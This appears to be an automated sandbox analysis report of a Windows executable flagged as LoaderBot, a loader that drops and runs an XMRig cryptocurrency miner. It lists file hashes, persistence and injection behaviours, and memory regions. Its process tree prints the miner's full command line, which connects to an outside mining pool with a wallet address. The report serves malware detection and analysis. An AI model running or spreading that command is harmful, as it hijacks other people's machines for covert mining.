Analysis

  • max time kernel
    79s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-12-2023 21:53

General

  • Target

    13f091c04b02de894b2b68404b101f5e.exe

  • Size

    2.1MB

  • MD5

    13f091c04b02de894b2b68404b101f5e

  • SHA1

    77be502649288dc78adfd4d887afd8c2f2e06fae

  • SHA256

    e88dc2a26b632c34188248f90b1a9f222d3da628839271d989be8fec039fb714

  • SHA512

    a115fed08b8f87c0d2dbf93a12c187c2d58ae5c54753ab7e9e82473cb5e2486bd6a435940ec38148a776436e26e52a9c71ee4f3e4aba6ae1c508488483f192cf

  • SSDEEP

    49152:3LeFWZXUM2OSAUhB0ETI++BrpMLdDQXWb+FPWRlW:/UM2DD5IhBrpCFQXk+FPWjW

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • LoaderBot executable 1 IoCs
  • XMRig Miner payload 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 35 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\13f091c04b02de894b2b68404b101f5e.exe
    "C:\Users\Admin\AppData\Local\Temp\13f091c04b02de894b2b68404b101f5e.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3728
    • C:\Users\Admin\AppData\Local\Temp\13f091c04b02de894b2b68404b101f5e.exe
      C:\Users\Admin\AppData\Local\Temp\13f091c04b02de894b2b68404b101f5e.exe
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Adds Run key to start application
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4604
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 49ciCfWrkhQWz6LYXux4LV1P5eAFMfox1H2y3k6VSn7Jb39nDYDUiC6JFCUBDDf63GQqpKc5ZQQ8vCHwgzesAKHtJwB9o2i -p x -k -v=0 --donate-level=1 -t 4
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:4728

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\13f091c04b02de894b2b68404b101f5e.exe.log

    Filesize

    605B

    MD5

    3654bd2c6957761095206ffdf92b0cb9

    SHA1

    6f10f7b5867877de7629afcff644c265e79b4ad3

    SHA256

    c2a4be94cf4ed33d698d9838f4ffb47047da796e733ec11562463a1621212ab4

    SHA512

    e2a81248cca7732ce098088d5237897493fd3629e28d66bc13e5f9191f72cd52893f4a53905906af12d5c6de475738b6c7f6b718a32869e9ee0deb3a54672f79

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

    Filesize

    3.9MB

    MD5

    02569a7a91a71133d4a1023bf32aa6f4

    SHA1

    0f16bcb3f3f085d3d3be912195558e9f9680d574

    SHA256

    8d6abba9b216172cfc64b8802db0d20a1c634c96e1049f451eddba2363966bf0

    SHA512

    534be1fe93ee556a14cfd8fad5377f57fb056ab4cd2bca14e4f376f4a25d3d4d270917d68a90b3c40d8a8daaeba6f592fa095ecff478332ba23405d1df728322

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

    Filesize

    2.1MB

    MD5

    0396e36c697a74bc1d6754f0524f4372

    SHA1

    67c75c8d47565e42fdfd4131b53c4eca75fa336a

    SHA256

    2fb6292fd092134c8a62e75f73db4dd1c937f33091cd95ff754bec1fcc1fb110

    SHA512

    75eddf4a1d1dc216fe05c3f1c45315ffe26c606be6ec3a40598aa46d06d97d95a59bfb2523e230d4b55547e014348ca13921ad34a1b9a28b3c00caf5ba44ba78

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe

    Filesize

    673KB

    MD5

    937d61a7c9ef3750cce05cc28f7260ed

    SHA1

    d0fb9ac1c6ea4af8b9a86b9d0c705029165f0329

    SHA256

    87a2f1ea4e29ecee0ee9376c85d11232fa69a3a9c4cac5c59f6bbf9fda2dcc9d

    SHA512

    c656eb4381e1b483b4f1dc118775f2559a0d5ef2ade8c1c3de08c35034053948dd922090586b1810316020c3ceff5c21acd4d7d258a13dcfee65761ebfe5a3a3

  • memory/3728-6-0x0000000005D20000-0x0000000005D40000-memory.dmp

    Filesize

    128KB

  • memory/3728-5-0x0000000005B20000-0x0000000005B30000-memory.dmp

    Filesize

    64KB

  • memory/3728-4-0x0000000074F50000-0x0000000075700000-memory.dmp

    Filesize

    7.7MB

  • memory/3728-7-0x0000000005DD0000-0x0000000005E46000-memory.dmp

    Filesize

    472KB

  • memory/3728-8-0x0000000005DB0000-0x0000000005DCE000-memory.dmp

    Filesize

    120KB

  • memory/3728-0-0x0000000074F50000-0x0000000075700000-memory.dmp

    Filesize

    7.7MB

  • memory/3728-3-0x0000000003420000-0x0000000003421000-memory.dmp

    Filesize

    4KB

  • memory/3728-2-0x0000000005B20000-0x0000000005B30000-memory.dmp

    Filesize

    64KB

  • memory/3728-14-0x0000000074F50000-0x0000000075700000-memory.dmp

    Filesize

    7.7MB

  • memory/3728-1-0x0000000000E90000-0x00000000010A4000-memory.dmp

    Filesize

    2.1MB

  • memory/4604-9-0x0000000000400000-0x00000000007FE000-memory.dmp

    Filesize

    4.0MB

  • memory/4604-31-0x0000000074F50000-0x0000000075700000-memory.dmp

    Filesize

    7.7MB

  • memory/4604-16-0x00000000053D0000-0x00000000053E0000-memory.dmp

    Filesize

    64KB

  • memory/4604-17-0x0000000005750000-0x00000000057B6000-memory.dmp

    Filesize

    408KB

  • memory/4604-12-0x0000000074F50000-0x0000000075700000-memory.dmp

    Filesize

    7.7MB

  • memory/4604-33-0x00000000053D0000-0x00000000053E0000-memory.dmp

    Filesize

    64KB

  • memory/4728-35-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-39-0x0000000002060000-0x0000000002080000-memory.dmp

    Filesize

    128KB

  • memory/4728-32-0x0000000001FE0000-0x0000000002000000-memory.dmp

    Filesize

    128KB

  • memory/4728-29-0x0000000000440000-0x0000000000454000-memory.dmp

    Filesize

    80KB

  • memory/4728-34-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-27-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-36-0x0000000002000000-0x0000000002020000-memory.dmp

    Filesize

    128KB

  • memory/4728-37-0x0000000002020000-0x0000000002040000-memory.dmp

    Filesize

    128KB

  • memory/4728-38-0x0000000002040000-0x0000000002060000-memory.dmp

    Filesize

    128KB

  • memory/4728-30-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-40-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-41-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-42-0x0000000002000000-0x0000000002020000-memory.dmp

    Filesize

    128KB

  • memory/4728-43-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB

  • memory/4728-44-0x0000000002020000-0x0000000002040000-memory.dmp

    Filesize

    128KB

  • memory/4728-45-0x0000000002040000-0x0000000002060000-memory.dmp

    Filesize

    128KB

  • memory/4728-46-0x0000000002060000-0x0000000002080000-memory.dmp

    Filesize

    128KB

  • memory/4728-47-0x0000000140000000-0x0000000140B75000-memory.dmp

    Filesize

    11.5MB